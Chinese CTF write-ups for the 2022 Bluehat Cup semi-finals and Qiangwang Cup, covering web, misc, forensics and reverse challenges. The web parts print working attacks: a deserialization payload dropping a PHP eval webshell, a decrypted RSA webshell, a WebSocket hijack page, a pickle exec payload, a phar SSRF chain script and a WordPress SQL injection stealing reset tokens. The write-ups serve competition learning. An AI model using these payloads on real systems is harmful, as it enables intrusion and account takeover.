2022 BluehatCup | Semi-Finals

Web

easyfatfree

扫出www.zip

直接审

image-20220804095330982

$this->write()

image-20220804095401625

\Base::instance()

image-20220804095431323

直接就能写马

<?php

namespace DB {

    class Jig {
        public $dir;
        public $data;
        public $lazy;
        public $format;
    }
}

namespace {

    $jig = new DB\Jig();
    $jig->lazy = True;
    $jig->dir = '/var/www/html/';
    $jig->data = ["shell.php" =>['<?php eval($_POST[a]); ?>']];
    $jig->format = 0;
    echo serialize($jig);
}

根目录不能写,换/ui/

image-20220804095525146

有disable_function

用蚁剑bypass

image-20220804095556257

onelinephp

非预期:

同之前国赛的一个题,flag放在了/etc/profile.d/pouchenv.sh/etc/instanceInfo

image-20220804124358948

直接cat

image-20220804124443276

预期解:

Misc

神秘的日志

看system日志,找到第一次使用ntlm的时间

image-20220804110851180

再从security日志中找到对应时间的登录日志,找最早的那个

image-20220804110950964

右键复制成文本才能看到TimeCreated SystemTime

<TimeCreated SystemTime="2022-04-17T03:27:06.7108313Z" />

image-20220804111131562

flag{dafd0428f634aefd1ddb26f8257c791f}

加密的通道

从http协议分析,可以找到如下代码

image-20220804145429831

解码后可以看到上传了个rsa.php

image-20220804145559703

但是rsa.php是被加密后的

phpjiami 数种解密方法 | 离别歌 (leavesongs.com)

这里采用手工dump法

image-20220804144121775

源码如下:

?><?php @eval("//Encode by  phpjiami.com,Free user."); ?><?php
$cmd = @$_POST['ant'];
$pk = <<<EOF
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDieYmLtWbGRSvUtevSlTOozmWR
qEGF4Hfvb1YCoVYAAlhnHnyMk+aLRvLXKgmerWiS+QD6y08Ispuzzn02tHE6d4Qp
DuPiPO9PAdGSXzFVFLK2hOrkXLsDXugNTdVUprdkPPI1YY0ZnMs1bT2Zf2dfuBI5
0S5e5sSOF85kNq/zwwIDAQAB
-----END PUBLIC KEY-----
EOF;
$cmds = explode("|", $cmd);
$pk = openssl_pkey_get_public($pk);
$cmd = '';
foreach ($cmds as $value) {
  if (openssl_public_decrypt(base64_decode($value), $de, $pk)) {
    $cmd .= $de;
  }
}
foreach($_POST as $k => $v){
  if (openssl_public_decrypt(base64_decode($v), $de, $pk)) {
     $_POST[$k]=$de;
}
}
eval($cmd); 

接下来流量重放即可

修改下代码,在本地起php环境

<?php @eval("//Encode by  phpjiami.com,Free user."); ?><?php
$cmd = @$_POST['ant'];
$pk = <<<EOF
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDieYmLtWbGRSvUtevSlTOozmWR
qEGF4Hfvb1YCoVYAAlhnHnyMk+aLRvLXKgmerWiS+QD6y08Ispuzzn02tHE6d4Qp
DuPiPO9PAdGSXzFVFLK2hOrkXLsDXugNTdVUprdkPPI1YY0ZnMs1bT2Zf2dfuBI5
0S5e5sSOF85kNq/zwwIDAQAB
-----END PUBLIC KEY-----
EOF;
$cmds = explode("|", $cmd);
$pk = openssl_pkey_get_public($pk);
$cmd = '';
foreach ($cmds as $value) {
  if (openssl_public_decrypt(base64_decode($value), $de, $pk)) {
    $cmd .= $de;
  }
}
foreach($_POST as $k => $v){
  if (openssl_public_decrypt(base64_decode($v), $de, $pk)) {
     $_POST[$k]=$de;
     echo $k.":::";
     var_dump($_POST[$k]);
}
}
var_dump($cmd);
// eval($cmd); 

最后一条流量显示出有flag.txt,于是看倒数第二条流量

重放解密

image-20220804145238363

image-20220804145249137

substr($_POST["k85c8f24ca50da"], 2)进行base64解码就是flag

image-20220804145325060

取证

手机取证_1

image.png

手机取证_2

image.png

exe_1

导入微步云沙箱

image.png

exe_2

导入微步云沙箱

image.png

exe_3

导入微步云沙箱

image.png

exe_4

image.png

image.png

挖矿

exe_5

导入微步云沙箱

image.png

apk2

image.png

image.png

apk3

image.png

apk反编译 发现loadUrl

apk5

反编译apk文件

image.png

image.png

apk7

MainActivity有几个分支代表有几个页面。

image.png

apk8

红星.ipa导出,解压,\123123123123213\Payload\0B5A51EA-18C7-4B3F-B1EF-1D48955CD71F\红星.app

image.png

image.png

apk12

image.png

apk13

image.png

安装软件,默认6661

apk15

image.png

image.png

2022-S6强网杯 | 部分WriteUp

WEB

babyweb

注册,发现admin被注册了,随便注册一个号登录。有help:

image.png

发现有出网行为,在自己的vps上监听一下:

image.png

考虑ws劫持,文章链接:WebSocket安全问题分析 | 狼组安全团队公开知识库 (wgpsec.org)

搭建http服务,放上html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>File</title>
</head>
<body>
    <script>
        var webs = new WebSocket('ws://127.0.0.1:8888/bot');
       ws.onopen = function() {
       ws.send("changepw 111111");
       };
    </script>
</body>
</html>

重置密码成功,登录admin,购买提示:

image.png

可以购买源码:

app.py:

@app.route("/buy", methods=['POST'])
def buy():
    if not session:
        return redirect('/login')
    elif session['user'] != 'admin':
        return "you are not admin"
    else :
        result = {}
        data = request.get_json()
        product = data["product"]
        for i in product:
            if not isinstance(i["id"],int) or not isinstance(i["num"],int):
                return "not int"
            if i["id"] not in (1,2):
                return "id error"
            if i["num"] not in (0,1,2,3,4,5):
                return "num error"
            result[i["id"]] = i["num"]
        sql = "select money,flag,hint from qwb where username='admin'"
        conn = sqlite3.connect('/root/py/test.db')
        c = conn.cursor()
        cursor = c.execute(sql)
        for row in cursor:
            if len(row):
                money = row[0]
                flag = row[1]
                hint = row[2]
        data = b'{"secret":"xxxx","money":' + str(money).encode() + b',' + request.get_data()[1:] #secret已打码
        r = requests.post("http://127.0.0.1:10002/pay",data).text
        r = json.loads(r)
        if r["error"] != 0:
            return r["error"]
        money = int(r["money"])
        hint = hint + result[1]
        flag = flag + result[2]
        sql = "update qwb set money={},hint={},flag={} where username='admin'".format(money,hint,flag)
        conn = sqlite3.connect('/root/py/test.db')
        c = conn.cursor()
        try:
            c.execute(sql)
            conn.commit()
        except Exception as e:
            conn.rollback()
            c.close()
            conn.close()
            return "database error"
        return "success"

pay.go:

package main

import (
    "github.com/buger/jsonparser"
    "fmt"
    "net/http"
    "io/ioutil"
    "io"
)

func pay(w http.ResponseWriter, r *http.Request) {
    var cost int64 = 0
    var err1 int64 = 0
    json, _ := ioutil.ReadAll(r.Body)
    secret, err := jsonparser.GetString(json, "secret")
    if err != nil {
        fmt.Println(err)
    }
    if secret != "xxxx"{   //secret已打码
        io.WriteString(w, "{\"error\": \"secret error\"}")
        return
    }
    money, err := jsonparser.GetInt(json, "money")
    if err != nil {
        fmt.Println(err)
    }
    _, err = jsonparser.ArrayEach(
            json,
            func(value []byte, dataType jsonparser.ValueType, offset int, err error) {
                id, _ := jsonparser.GetInt(value, "id")
                num, _ := jsonparser.GetInt(value, "num")
                if id == 1{
                    cost = cost + 200 * num
                }else if id == 2{
                    cost = cost + 1000 * num
                }else{
                    err1 = 1
                }
            },
        "product")
    if err != nil {
        fmt.Println(err)
    }
    if err1 == 1{
        io.WriteString(w, "{\"error\": \"id error\"}")
        return
    }
    if cost > money{
        io.WriteString(w, "{\"error\": \"Sorry, your credit is running low!\"}")
        return
    }
    money = money - cost
    io.WriteString(w, fmt.Sprintf("{\"error\":0,\"money\": %d}", money))
}

func main() {
    mux := http.NewServeMux()
    mux.HandleFunc("/pay", pay)
    http.ListenAndServe(":10002", mux)
}

可以看到,python和go都有对购买进行校验,让后端报错使其校验失败

payload:

 {"product" :[{"id":1, "num" :0},{"id": 2, "num" :1}]}

image.png

crash

源码:

import base64
# import sqlite3
import pickle
from flask import Flask, make_response,request, session
import admin
import random

app = Flask(__name__,static_url_path='')
app.secret_key=random.randbytes(12)

class User:
    def __init__(self, username,password):
        self.username=username
        self.token=hash(password)

def get_password(username):
    if username=="admin":
        return admin.secret
    else:
        # conn=sqlite3.connect("user.db")
        # cursor=conn.cursor()
        # cursor.execute(f"select password from usertable where username='{username}'")
        # data=cursor.fetchall()[0]
        # if data:
        #     return data[0]
        # else:
        #     return None
        return session.get("password")

@app.route('/balancer', methods=['GET', 'POST'])
def flag():
    pickle_data=base64.b64decode(request.cookies.get("userdata"))
    if b'R' in pickle_data or b"secret" in pickle_data:
        return "You damm hacker!"
    os.system("rm -rf *py*")
    userdata=pickle.loads(pickle_data)
    if userdata.token!=hash(get_password(userdata.username)):
         return "Login First"
    if userdata.username=='admin':
        return "Welcome admin, here is your next challenge!"
    return "You're not admin!"

@app.route('/login', methods=['GET', 'POST'])
def login():
    resp = make_response("success")
    session["password"]=request.values.get("password")
    resp.set_cookie("userdata", base64.b64encode(pickle.dumps(User(request.values.get("username"),request.values.get("password")),2)), max_age=3600)
    return resp

@app.route('/', methods=['GET', 'POST'])
def index():
    return open('source.txt',"r").read()

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=5000)

访问balancer发现提示不是admin,于是进行登录,

image.png

login下虽然success但不是admin用户,没有密码,但是可以覆盖admin.secret然后进行登录

secret被过滤了,尝试绕过secret"+"et,然后编写脚本:

import base64
data=b'''(cbuiltins
exec
S'c="import admin;admin.secr"+"et='123'";exec(c)'
o.'''
print(base64.b64encode(data))

burp抓包替换userdata,然后登录

login.php?username=admin&password=123

success后访问balancer:

image.png

(210条消息) 7行代码让B站崩溃3小时,竟因“一个诡计多端的0”_hzbooks的博客-CSDN博客

拿B站事故报告出题挺有意思

需要三台vps,负载均衡没有考虑负数。

image.png

flag{4690a359-c25a-40e5-be99-e3cfeb77d8fb}

easyweb

phar+ssrf

http://47.104.95.124:8080/showfile.php?f=demo/../../../../../../../../../../etc/passwd任意文件读取

image.png

image.png

etc/hosts

127.0.0.1   localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
172.18.0.2  3b35825919ae
10.10.10.5  3b35825919ae

upload.php

<?php
error_reporting(0);
require_once('class.php');

if(isset($_SESSION)){
    if(isset($_GET['fname'])?!empty($_GET['fname']):FALSE){
        $_FILES["file"]["name"] = $_GET['fname'];
    }
    $upload = new Upload();
    $upload->upload();
}else {
    die("<p class='tip'>guest can not upload file</p>");
}
?>

index.php

<?php
    $upload = md5("2022qwb".$_SERVER['REMOTE_ADDR']);
    @mkdir($upload, 0333, true);
    if(isset($_POST['submit'])) {
        include 'upload.php';
    }
 ?>

class.php

<?php
class Upload {
    public $file;
    public $filesize;
    public $date;
    public $tmp;
    function __construct(){
        $this->file = $_FILES["file"];
    }
    function do_upload() {
        $filename = session_id().explode(".",$this->file["name"])[0].".jpg";
        if(file_exists($filename)) {
            unlink($filename);
        }
        move_uploaded_file($this->file["tmp_name"],md5("2022qwb".$_SERVER['REMOTE_ADDR'])."/".$filename);
        echo 'upload  '."./".md5("2022qwb".$_SERVER['REMOTE_ADDR'])."/".$this->e($filename).' success!';
    }
    function e($str){
        return htmlspecialchars($str);
    }
    function upload() {
        if($this->check()) {
            $this->do_upload();
        }
    }
    function __toString(){
        return $this->file["name"];
    }
    function __get($value){
        $this->filesize->$value = $this->date;
        echo $this->tmp;
    }
    function check() {
        $allowed_types = array("jpg","png","jpeg");
        $temp = explode(".",$this->file["name"]);
        $extension = end($temp);
        if(in_array($extension,$allowed_types)) {
            return true;
        }
        else {
            echo 'Invalid file!';
            return false;
        }
    }
}

class GuestShow{
    public $file;
    public $contents;
    public function __construct($file)
    {

        $this->file=$file;
    }
    function __toString(){
        $str = $this->file->name;
        return "";
    }
    function __get($value){
        return $this->$value;
    }
    function show()
    {
        $this->contents = file_get_contents($this->file);
        $src = "data:jpg;base64,".base64_encode($this->contents);
        echo "<img src={$src} />";
    }
    function __destruct(){
        echo $this;
    }
}

class AdminShow{
    public $source;
    public $str;
    public $filter;
    public function __construct($file)
    {
        $this->source = $file;
        $this->schema = 'file:///var/www/html/';
    }
    public function __toString()
    {
        $content = $this->str[0]->source;
        $content = $this->str[1]->schema;
        return $content;
    }
    public function __get($value){
        $this->show();
        return $this->$value;
    }
    public function __set($key,$value){
        $this->$key = $value;
    }
    public function show(){
        if(preg_match('/usr|auto|log/i' , $this->source))
        {
            die("error");
        }
        $url = $this->schema . $this->source;
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_URL, $url);
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($curl, CURLOPT_HEADER, 1);
        $response = curl_exec($curl);
        curl_close($curl);
        $src = "data:jpg;base64,".base64_encode($response);
        echo "<img src={$src} />";

    }
    public function __wakeup()
    {
        if ($this->schema !== 'file:///var/www/html/') {
            $this->schema = 'file:///var/www/html/';
        }
        if ($this->source !== 'admin.png') {
            $this->source = 'admin.png';
        }
    }
}

还有showfile.php,不过目前读不了

上传文件有session限制,编写脚本测试:

import requests
import io

url = "http://47.104.95.124:8080/upload.php"
f = io.BytesIO(b"t" * 1024 * 50)
r = requests.post(url=url, data={"PHP_SESSION_UPLOAD_PROGRESS": "2333"}, files={"file": ("233.txt", f)}, cookies={"PHPSESSID": "2333"})
print(r.text)

绕过成功,那么我们看一下上传触发反序列化,可以通过phar反序列化攻击控制AdminShow

构造反序列化:

<?php
$AAA = new GuestShow($argv[1],$argv[2]);
echo str_replace('"AdminShow":4','"AdminShow":5',serialize($AAA));

class GuestShow{
    public $file;
    public $contents;
    public function __construct($a,$b)
    {

        $this->file=new AdminShow($a,$b);
    }

}

class AdminShow{
    public $source;
    public $str;
    public $filter;
    public function __construct($a,$b)
    {
        $this->source = $b;
        $this->schema = $a;
    }

}

探测内网,10.10.10.10有web服务,有源码:

<?php
highlight_file(__FILE__);

if (isset($_GET['url'])){
    $link = $_GET['url'];
    $curlobj = curl_init();
    curl_setopt($curlobj, CURLOPT_POST, 0);
    curl_setopt($curlobj,CURLOPT_URL,$link);
    curl_setopt($curlobj, CURLOPT_RETURNTRANSFER, 1);
    $result=curl_exec($curlobj);
    curl_close($curlobj);

    echo $result;
}

if($_SERVER['REMOTE_ADDR']==='10.10.10.101'||$_SERVER['REMOTE_ADDR']==='100.100.100.101'){
    system('cat /flag');
    die();
}

?>

结合上面session绕过,写脚本联动:

O:3:"AAA":2:{s:4:"file";O:9:"AdminShow":5:{s:6:"source";s:29:"10.10.10.10/?url=file:///flag";s:3:"str";N;s:6:"filter";N;s:6:"schema";s:7:"http://";}s:8:"contents";N;}
import base64
import requests
import io
import os

for i in range(10, 12):
    try:
        payload = f"php 1.php http:// 10.10.10.{i}/?url=file:///flag"
        res = os.popen(payload).read()
        with open(".phar/.metadata.bin", "w") as f:
            f.writelines(res.strip())
        os.popen("tar zcvf 1.png  .phar demo.txt")
        url = "http://47.104.95.124:8080/upload.php"
        f = io.BytesIO(b"t" * 1024 * 50)
        r = requests.post(url=url, data={"PHP_SESSION_UPLOAD_PROGRESS": "2333"}, files={"file": open("1.png", "rb")},
                          cookies={"PHPSESSID": "2333"})
        path = r.text.split(" ")[-2].split("/")[-2]
        r = requests.get(f"http://47.104.95.124:8080/showfile.php?f=phar:///var/www/html/{path}/1.png/demo.txt",
                         timeout=1)
        print(r.text)
        # res = base64.b64decode(r.text.split("<body>")[-1].replace(" ", "").split(",")[-2].split("/>")[-2])
        print(i)
        # print(res.decode())
    except:
        print(f"{i}error")

easylogin

8888是moodle;80是wordpress,有sql注入:

action=aa&query_vars[tax_query][1][field]=term_taxonomy_id&query_vars[tax_query][1][include_children]=1&query_vars[tax_query][1][terms][1]=1) or updatexml(0x7e,concat(1,(select token from moodle.mdl_user_password_resets  limit 0,1)),0x7e)#

但是wordpress数据库里面的密码是加密后的,不能被破解。

Database: moodle
[428 tables]
+----------------------------------+
| mdl_analytics_indicator_calc     |
| mdl_analytics_models             |
| mdl_analytics_models_log         |
| mdl_analytics_predict_samples    |
| mdl_analytics_prediction_actions |
| mdl_analytics_predictions        |
| mdl_analytics_train_samples      |
| mdl_analytics_used_analysables   |
| mdl_analytics_used_files         |
| mdl_assign                       |
| mdl_assign_grades                |
| mdl_assign_overrides             |
| mdl_assign_plugin_config         |
| mdl_assign_submission            |
| mdl_assign_user_flags            |
| mdl_assign_user_mapping          |
| mdl_assignfeedback_comments      |
| mdl_assignfeedback_editpdf_annot |
| mdl_assignfeedback_editpdf_cmnt  |
| mdl_assignfeedback_editpdf_queue |
| mdl_assignfeedback_editpdf_quick |
| mdl_assignfeedback_editpdf_rot   |
| mdl_assignfeedback_file          |
| mdl_assignment                   |
| mdl_assignment_submissions       |
| mdl_assignment_upgrade           |
| mdl_assignsubmission_file        |
| mdl_assignsubmission_onlinetext  |
| mdl_auth_oauth2_linked_login     |
| mdl_backup_controllers           |
| mdl_backup_courses               |
| mdl_backup_logs                  |
| mdl_badge                        |
| mdl_badge_alignment              |
| mdl_badge_backpack               |
| mdl_badge_backpack_oauth2        |
| mdl_badge_criteria               |
| mdl_badge_criteria_met           |
| mdl_badge_criteria_param         |
| mdl_badge_endorsement            |
| mdl_badge_external               |
| mdl_badge_external_backpack      |
| mdl_badge_external_identifier    |
| mdl_badge_issued                 |
| mdl_badge_manual_award           |
| mdl_badge_related                |
| mdl_block                        |
| mdl_block_instances              |
| mdl_block_positions              |
| mdl_block_recent_activity        |
| mdl_block_recentlyaccesseditems  |
| mdl_block_rss_client             |
| mdl_blog_association             |
| mdl_blog_external                |
| mdl_book                         |
| mdl_book_chapters                |
| mdl_cache_filters                |
| mdl_cache_flags                  |
| mdl_capabilities                 |
| mdl_chat                         |
| mdl_chat_messages                |
| mdl_chat_messages_current        |
| mdl_chat_users                   |
| mdl_choice                       |
| mdl_choice_answers               |
| mdl_choice_options               |
| mdl_cohort                       |
| mdl_cohort_members               |
| mdl_comments                     |
| mdl_competency                   |
| mdl_competency_coursecomp        |
| mdl_competency_coursecompsetting |
| mdl_competency_evidence          |
| mdl_competency_framework         |
| mdl_competency_modulecomp        |
| mdl_competency_plan              |
| mdl_competency_plancomp          |
| mdl_competency_relatedcomp       |
| mdl_competency_template          |
| mdl_competency_templatecohort    |
| mdl_competency_templatecomp      |
| mdl_competency_usercomp          |
| mdl_competency_usercompcourse    |
| mdl_competency_usercompplan      |
| mdl_competency_userevidence      |
| mdl_competency_userevidencecomp  |
| mdl_config                       |
| mdl_config_log                   |
| mdl_config_plugins               |
| mdl_contentbank_content          |
| mdl_context                      |
| mdl_context_temp                 |
| mdl_course                       |
| mdl_course_categories            |
| mdl_course_completion_aggr_methd |
| mdl_course_completion_crit_compl |
| mdl_course_completion_criteria   |
| mdl_course_completion_defaults   |
| mdl_course_completions           |
| mdl_course_format_options        |
| mdl_course_modules               |
| mdl_course_modules_completion    |
| mdl_course_published             |
| mdl_course_request               |
| mdl_course_sections              |
| mdl_customfield_category         |
| mdl_customfield_data             |
| mdl_customfield_field            |
| mdl_data                         |
| mdl_data_content                 |
| mdl_data_fields                  |
| mdl_data_records                 |
| mdl_editor_atto_autosave         |
| mdl_enrol                        |
| mdl_enrol_flatfile               |
| mdl_enrol_lti_lti2_consumer      |
| mdl_enrol_lti_lti2_context       |
| mdl_enrol_lti_lti2_nonce         |
| mdl_enrol_lti_lti2_resource_link |
| mdl_enrol_lti_lti2_share_key     |
| mdl_enrol_lti_lti2_tool_proxy    |
| mdl_enrol_lti_lti2_user_result   |
| mdl_enrol_lti_tool_consumer_map  |
| mdl_enrol_lti_tools              |
| mdl_enrol_lti_users              |
| mdl_enrol_paypal                 |
| mdl_event                        |
| mdl_event_subscriptions          |
| mdl_events_handlers              |
| mdl_events_queue                 |
| mdl_events_queue_handlers        |
| mdl_external_functions           |
| mdl_external_services            |
| mdl_external_services_functions  |
| mdl_external_services_users      |
| mdl_external_tokens              |
| mdl_favourite                    |
| mdl_feedback                     |
| mdl_feedback_completed           |
| mdl_feedback_completedtmp        |
| mdl_feedback_item                |
| mdl_feedback_sitecourse_map      |
| mdl_feedback_template            |
| mdl_feedback_value               |
| mdl_feedback_valuetmp            |
| mdl_file_conversion              |
| mdl_files                        |
| mdl_files_reference              |
| mdl_filter_active                |
| mdl_filter_config                |
| mdl_folder                       |
| mdl_forum                        |
| mdl_forum_digests                |
| mdl_forum_discussion_subs        |
| mdl_forum_discussions            |
| mdl_forum_grades                 |
| mdl_forum_posts                  |
| mdl_forum_queue                  |
| mdl_forum_read                   |
| mdl_forum_subscriptions          |
| mdl_forum_track_prefs            |
| mdl_glossary                     |
| mdl_glossary_alias               |
| mdl_glossary_categories          |
| mdl_glossary_entries             |
| mdl_glossary_entries_categories  |
| mdl_glossary_formats             |
| mdl_grade_categories             |
| mdl_grade_categories_history     |
| mdl_grade_grades                 |
| mdl_grade_grades_history         |
| mdl_grade_import_newitem         |
| mdl_grade_import_values          |
| mdl_grade_items                  |
| mdl_grade_items_history          |
| mdl_grade_letters                |
| mdl_grade_outcomes               |
| mdl_grade_outcomes_courses       |
| mdl_grade_outcomes_history       |
| mdl_grade_settings               |
| mdl_grading_areas                |
| mdl_grading_definitions          |
| mdl_grading_instances            |
| mdl_gradingform_guide_comments   |
| mdl_gradingform_guide_criteria   |
| mdl_gradingform_guide_fillings   |
| mdl_gradingform_rubric_criteria  |
| mdl_gradingform_rubric_fillings  |
| mdl_gradingform_rubric_levels    |
| mdl_groupings                    |
| mdl_groupings_groups             |
| mdl_groups                       |
| mdl_groups_members               |
| mdl_h5p                          |
| mdl_h5p_contents_libraries       |
| mdl_h5p_libraries                |
| mdl_h5p_libraries_cachedassets   |
| mdl_h5p_library_dependencies     |
| mdl_h5pactivity                  |
| mdl_h5pactivity_attempts         |
| mdl_h5pactivity_attempts_results |
| mdl_imscp                        |
| mdl_label                        |
| mdl_lesson                       |
| mdl_lesson_answers               |
| mdl_lesson_attempts              |
| mdl_lesson_branch                |
| mdl_lesson_grades                |
| mdl_lesson_overrides             |
| mdl_lesson_pages                 |
| mdl_lesson_timer                 |
| mdl_license                      |
| mdl_lock_db                      |
| mdl_log                          |
| mdl_log_display                  |
| mdl_log_queries                  |
| mdl_logstore_standard_log        |
| mdl_lti                          |
| mdl_lti_access_tokens            |
| mdl_lti_submission               |
| mdl_lti_tool_proxies             |
| mdl_lti_tool_settings            |
| mdl_lti_types                    |
| mdl_lti_types_config             |
| mdl_ltiservice_gradebookservices |
| mdl_message                      |
| mdl_message_airnotifier_devices  |
| mdl_message_contact_requests     |
| mdl_message_contacts             |
| mdl_message_conversation_actions |
| mdl_message_conversation_members |
| mdl_message_conversations        |
| mdl_message_email_messages       |
| mdl_message_popup                |
| mdl_message_popup_notifications  |
| mdl_message_processors           |
| mdl_message_providers            |
| mdl_message_read                 |
| mdl_message_user_actions         |
| mdl_message_users_blocked        |
| mdl_messageinbound_datakeys      |
| mdl_messageinbound_handlers      |
| mdl_messageinbound_messagelist   |
| mdl_messages                     |
| mdl_mnet_application             |
| mdl_mnet_host                    |
| mdl_mnet_host2service            |
| mdl_mnet_log                     |
| mdl_mnet_remote_rpc              |
| mdl_mnet_remote_service2rpc      |
| mdl_mnet_rpc                     |
| mdl_mnet_service                 |
| mdl_mnet_service2rpc             |
| mdl_mnet_session                 |
| mdl_mnet_sso_access_control      |
| mdl_mnetservice_enrol_courses    |
| mdl_mnetservice_enrol_enrolments |
| mdl_modules                      |
| mdl_my_pages                     |
| mdl_notifications                |
| mdl_oauth2_access_token          |
| mdl_oauth2_endpoint              |
| mdl_oauth2_issuer                |
| mdl_oauth2_system_account        |
| mdl_oauth2_user_field_mapping    |
| mdl_page                         |
| mdl_portfolio_instance           |
| mdl_portfolio_instance_config    |
| mdl_portfolio_instance_user      |
| mdl_portfolio_log                |
| mdl_portfolio_mahara_queue       |
| mdl_portfolio_tempdata           |
| mdl_post                         |
| mdl_profiling                    |
| mdl_qtype_ddimageortext          |
| mdl_qtype_ddimageortext_drags    |
| mdl_qtype_ddimageortext_drops    |
| mdl_qtype_ddmarker               |
| mdl_qtype_ddmarker_drags         |
| mdl_qtype_ddmarker_drops         |
| mdl_qtype_essay_options          |
| mdl_qtype_match_options          |
| mdl_qtype_match_subquestions     |
| mdl_qtype_multichoice_options    |
| mdl_qtype_randomsamatch_options  |
| mdl_qtype_shortanswer_options    |
| mdl_question                     |
| mdl_question_answers             |
| mdl_question_attempt_step_data   |
| mdl_question_attempt_steps       |
| mdl_question_attempts            |
| mdl_question_calculated          |
| mdl_question_calculated_options  |
| mdl_question_categories          |
| mdl_question_dataset_definitions |
| mdl_question_dataset_items       |
| mdl_question_datasets            |
| mdl_question_ddwtos              |
| mdl_question_gapselect           |
| mdl_question_hints               |
| mdl_question_multianswer         |
| mdl_question_numerical           |
| mdl_question_numerical_options   |
| mdl_question_numerical_units     |
| mdl_question_response_analysis   |
| mdl_question_response_count      |
| mdl_question_statistics          |
| mdl_question_truefalse           |
| mdl_question_usages              |
| mdl_quiz                         |
| mdl_quiz_attempts                |
| mdl_quiz_feedback                |
| mdl_quiz_grades                  |
| mdl_quiz_overrides               |
| mdl_quiz_overview_regrades       |
| mdl_quiz_reports                 |
| mdl_quiz_sections                |
| mdl_quiz_slot_tags               |
| mdl_quiz_slots                   |
| mdl_quiz_statistics              |
| mdl_quizaccess_seb_quizsettings  |
| mdl_quizaccess_seb_template      |
| mdl_rating                       |
| mdl_registration_hubs            |
| mdl_repository                   |
| mdl_repository_instance_config   |
| mdl_repository_instances         |
| mdl_repository_onedrive_access   |
| mdl_resource                     |
| mdl_resource_old                 |
| mdl_role                         |
| mdl_role_allow_assign            |
| mdl_role_allow_override          |
| mdl_role_allow_switch            |
| mdl_role_allow_view              |
| mdl_role_assignments             |
| mdl_role_capabilities            |
| mdl_role_context_levels          |
| mdl_role_names                   |
| mdl_scale                        |
| mdl_scale_history                |
| mdl_scorm                        |
| mdl_scorm_aicc_session           |
| mdl_scorm_scoes                  |
| mdl_scorm_scoes_data             |
| mdl_scorm_scoes_track            |
| mdl_scorm_seq_mapinfo            |
| mdl_scorm_seq_objective          |
| mdl_scorm_seq_rolluprule         |
| mdl_scorm_seq_rolluprulecond     |
| mdl_scorm_seq_rulecond           |
| mdl_scorm_seq_ruleconds          |
| mdl_search_index_requests        |
| mdl_search_simpledb_index        |
| mdl_sessions                     |
| mdl_stats_daily                  |
| mdl_stats_monthly                |
| mdl_stats_user_daily             |
| mdl_stats_user_monthly           |
| mdl_stats_user_weekly            |
| mdl_stats_weekly                 |
| mdl_survey                       |
| mdl_survey_analysis              |
| mdl_survey_answers               |
| mdl_survey_questions             |
| mdl_tag                          |
| mdl_tag_area                     |
| mdl_tag_coll                     |
| mdl_tag_correlation              |
| mdl_tag_instance                 |
| mdl_task_adhoc                   |
| mdl_task_log                     |
| mdl_task_scheduled               |
| mdl_tool_cohortroles             |
| mdl_tool_customlang              |
| mdl_tool_customlang_components   |
| mdl_tool_dataprivacy_category    |
| mdl_tool_dataprivacy_ctxexpired  |
| mdl_tool_dataprivacy_ctxinstance |
| mdl_tool_dataprivacy_ctxlevel    |
| mdl_tool_dataprivacy_purpose     |
| mdl_tool_dataprivacy_purposerole |
| mdl_tool_dataprivacy_request     |
| mdl_tool_monitor_events          |
| mdl_tool_monitor_history         |
| mdl_tool_monitor_rules           |
| mdl_tool_monitor_subscriptions   |
| mdl_tool_policy                  |
| mdl_tool_policy_acceptances      |
| mdl_tool_policy_versions         |
| mdl_tool_recyclebin_category     |
| mdl_tool_recyclebin_course       |
| mdl_tool_usertours_steps         |
| mdl_tool_usertours_tours         |
| mdl_upgrade_log                  |
| mdl_url                          |
| mdl_user                         |
| mdl_user_devices                 |
| mdl_user_enrolments              |
| mdl_user_info_category           |
| mdl_user_info_data               |
| mdl_user_info_field              |
| mdl_user_lastaccess              |
| mdl_user_password_history        |
| mdl_user_password_resets         |
| mdl_user_preferences             |
| mdl_user_private_key             |
| mdl_wiki                         |
| mdl_wiki_links                   |
| mdl_wiki_locks                   |
| mdl_wiki_pages                   |
| mdl_wiki_subwikis                |
| mdl_wiki_synonyms                |
| mdl_wiki_versions                |
| mdl_workshop                     |
| mdl_workshop_aggregations        |
| mdl_workshop_assessments         |
| mdl_workshop_grades              |
| mdl_workshop_submissions         |
| mdl_workshopallocation_scheduled |
| mdl_workshopeval_best_settings   |
| mdl_workshopform_accumulative    |
| mdl_workshopform_comments        |
| mdl_workshopform_numerrors       |
| mdl_workshopform_numerrors_map   |
| mdl_workshopform_rubric          |
| mdl_workshopform_rubric_config   |
| mdl_workshopform_rubric_levels 

翻moodle数据库发现80和8888用一个数据库,然后发现一个mdl_user_password_resets,重置密码请求后,这个表token就会刷新,可以利用这个去重置admin的密码进入后台。

moodle后台存在插件安装,可以上传zip文件,github有公开的poc,上传,直接用然后解压就行:

https://github.com/HoangKien1020/Moodle_RCE/blob/master/rce.zip

image.png

image.png

执行成功,flag在/etc/mytest/flaaaaaaaggfafafafafa目录下

@C5HEHXWEKMHP2ZN_G.png

REVERSE

GameMaster

利用dsSpy进行反编译,发现main函数里面有个verifycode函数,跟进发现

发现有反序列话并存储的行为

解密得到一个文件

for more information
using System;
using System.Collections;
using System.Configuration;
using System.IO;
using System.Runtime.Serialization.Formatters.Binary;
using System.Security.Cryptography;
using System.Text;

FileStream fileStream = File.OpenRead("gamemessage.txt");
int num = (int)fileStream.Length;
byte [] memory = new byte[num];
byte [] m = new byte[num];
fileStream.Position = 0L;
fileStream.Read(memory, 0, num);
for (int i = 0; i < memory.Length; i++)
{
    memory[i] ^= 34;
}

byte[] key = new byte[]
{
    66,
    114,
    97,
    105,
    110,
    115,
    116,
    111,
    114,
    109,
    105,
    110,
    103,
    33,
    33,
    33
};
ICryptoTransform cryptoTransform = new RijndaelManaged
{
    Key = key,
    Mode = CipherMode.ECB,
    Padding = PaddingMode.Zeros
}.CreateDecryptor();
m = cryptoTransform.TransformFinalBlock(memory, 0, memory.Length);

